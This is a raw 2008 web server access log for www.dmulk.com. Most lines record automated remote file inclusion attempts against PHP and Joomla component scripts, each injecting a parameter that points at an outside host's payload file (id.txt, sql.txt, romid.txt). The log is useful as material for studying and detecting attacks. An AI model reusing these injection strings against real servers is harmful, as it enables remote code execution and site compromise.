87.118.118.156 - - [24/Jun/2008:10:14:26 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:10:14:41 -0700] "GET //errors.php?error=http://www.geocities.com/distovario/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:10:14:41 -0700] "GET /logs//errors.php?error=http://www.geocities.com/distovario/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:14:43 -0700] "GET /logs/access_080312.log/index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:14:56 -0700] "GET /logs/access_080312.log/index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.165.49.171 - - [24/Jun/2008:10:14:56 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.143.174 - - [24/Jun/2008:10:15:08 -0700] "GET /logs/access_080211.log/main.php?command=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.143.174 - - [24/Jun/2008:10:15:08 -0700] "GET /main.php?command=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.143.174 - - [24/Jun/2008:10:15:09 -0700] "GET /logs/main.php?command=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.11.241.154 - - [24/Jun/2008:10:15:20 -0700] "GET /logs/access_080211.log/main.php?command=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.11.241.154 - - [24/Jun/2008:10:15:20 -0700] "GET /main.php?command=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.11.241.154 - - [24/Jun/2008:10:15:20 -0700] "GET /logs/main.php?command=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:15:21 -0700] "GET /logs/access_080127.log/administrator/components/com_jcs/views/upload.html.php?mosConfig_absolute_path=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.139.226 - - [24/Jun/2008:10:15:32 -0700] "GET /logs/access.log/index.php?url=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [24/Jun/2008:10:15:34 -0700] "GET /index.php?url=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 200 18395 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [24/Jun/2008:10:15:34 -0700] "GET /logs/index.php?url=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:15:49 -0700] "GET /logs/access_080127.log/administrator/components/com_jcs/views/upload.html.php?mosConfig_absolute_path=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:10:15:52 -0700] "GET /avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:15:54 -0700] "GET /logs/index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:15:55 -0700] "GET /index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 200 18405 "-" "libwww-perl/5.800" "www.dmulk.com"
82.156.218.20 - - [24/Jun/2008:10:16:13 -0700] "GET /logs/access_080211.log/main.php?command=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.156.218.20 - - [24/Jun/2008:10:16:13 -0700] "GET /main.php?command=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.156.218.20 - - [24/Jun/2008:10:16:14 -0700] "GET /logs/main.php?command=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:16:29 -0700] "GET /logs/index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:16:30 -0700] "GET /index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 200 18389 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:16:32 -0700] "GET /logs/access_080117.log/components/com_forum/download.php?phpbb_root_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:16:32 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:16:45 -0700] "GET /logs/access_080117.log/components/com_forum/download.php?phpbb_root_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:16:45 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:16:46 -0700] "GET /logs/access.log/index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:16:48 -0700] "GET /index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 200 18405 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:16:49 -0700] "GET /logs/index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:17:19 -0700] "GET /logs/access_080218.log/index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:10:17:21 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:10:17:21 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.84 - - [24/Jun/2008:10:17:49 -0700] "GET /logs/access_080118.log/index.php?url=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [24/Jun/2008:10:18:44 -0700] "GET /logs/access_080118.log/index.php?url=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:10:18:46 -0700] "GET /logs/access_080212.log/avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:10:18:47 -0700] "GET /logs/avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:19:38 -0700] "GET /logs/access_080117.log/components/com_forum/download.php?phpbb_root_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:19:38 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:19:39 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:10:20:21 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.221.143.111 - - [24/Jun/2008:10:20:21 -0700] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [24/Jun/2008:10:20:21 -0700] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.89.22.121 - - [24/Jun/2008:10:20:44 -0700] "GET /logs/access_080321.log/!scanhttp://sucomais2.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
194.165.49.171 - - [24/Jun/2008:10:21:32 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [24/Jun/2008:10:21:32 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [24/Jun/2008:10:21:33 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:22:26 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:10:23:19 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:10:23:20 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:10:23:20 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:10:23:27 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:10:23:27 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:10:23:28 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:10:23:28 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:10:23:29 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.45.190.171 - - [24/Jun/2008:10:24:09 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.171 - - [24/Jun/2008:10:24:10 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.171 - - [24/Jun/2008:10:24:11 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.165 - - [24/Jun/2008:10:24:18 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.157 - - [24/Jun/2008:10:24:19 -0700] "GET /logs/access_071212.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:24:23 -0700] "GET /logs/access_080121.log/components/com_forum/download.php?phpbb_root_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:10:24:23 -0700] "GET //errors.php?error=http://www.geocities.com/distovario/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:10:24:23 -0700] "GET /logs//errors.php?error=http://www.geocities.com/distovario/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.6.17.172 - - [24/Jun/2008:10:24:53 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.169 - - [24/Jun/2008:10:24:53 -0700] "GET /logs/access_080201.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:25:26 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:25:26 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:25:27 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:25:32 -0700] "GET /logs/access_080105.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:25:41 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:25:41 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:25:41 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:26:07 -0700] "GET /index.php?sourcedir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 500 374 "-" "libwww-perl/5.800" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:10:26:31 -0700] "GET /logs/access_080326.log/avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:26:33 -0700] "GET /logs/access_080105.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.140.215 - - [24/Jun/2008:10:26:33 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [24/Jun/2008:10:26:33 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.25.34 - - [24/Jun/2008:10:26:34 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://thepornhandbook.com/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:26:39 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:26:39 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:26:39 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:26:44 -0700] "GET /logs/access_080105.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:26:50 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:26:50 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:26:50 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:26:50 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:26:51 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:26:51 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:26:56 -0700] "GET /logs/access_080105.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:27:10 -0700] "GET /lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:27:10 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:27:10 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:27:11 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:27:11 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:10:27:11 -0700] "GET /lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:27:35 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:27:35 -0700] "GET /lostpasswd.php?env[include_prefix]=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:27:35 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.241.242 - - [24/Jun/2008:10:27:44 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [24/Jun/2008:10:27:45 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [24/Jun/2008:10:27:45 -0700] "GET /logs/access_080105.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [24/Jun/2008:10:27:45 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.165.49.171 - - [24/Jun/2008:10:27:54 -0700] "GET /logs//jscript.php?my_ms[root]=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [24/Jun/2008:10:27:54 -0700] "GET //jscript.php?my_ms[root]=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.213 - - [24/Jun/2008:10:28:36 -0700] "GET /logs/access_080215.log//includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.213 - - [24/Jun/2008:10:28:36 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.213 - - [24/Jun/2008:10:28:36 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.132.7.238 - - [24/Jun/2008:10:28:39 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.120.241.242 - - [24/Jun/2008:10:28:53 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [24/Jun/2008:10:28:53 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [24/Jun/2008:10:28:53 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.132.7.238 - - [24/Jun/2008:10:29:22 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.195.37.185 - - [24/Jun/2008:10:29:37 -0700] "GET /logs/access_071216.log HTTP/1.0" 200 200644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:30:00 -0700] "GET /logs/access.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:30:00 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:30:00 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:30:08 -0700] "GET /logs//encapscms_PATH/core/core.php?root=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:30:08 -0700] "GET //encapscms_PATH/core/core.php?root=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:30:09 -0700] "GET /logs//encapscms_PATH/core/core.php?root=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:30:09 -0700] "GET //encapscms_PATH/core/core.php?root=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.73.161 - - [24/Jun/2008:10:31:00 -0700] "GET /megumi/minamigrad2k8/IMG_1605.CR2 HTTP/1.1" 200 9026912 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
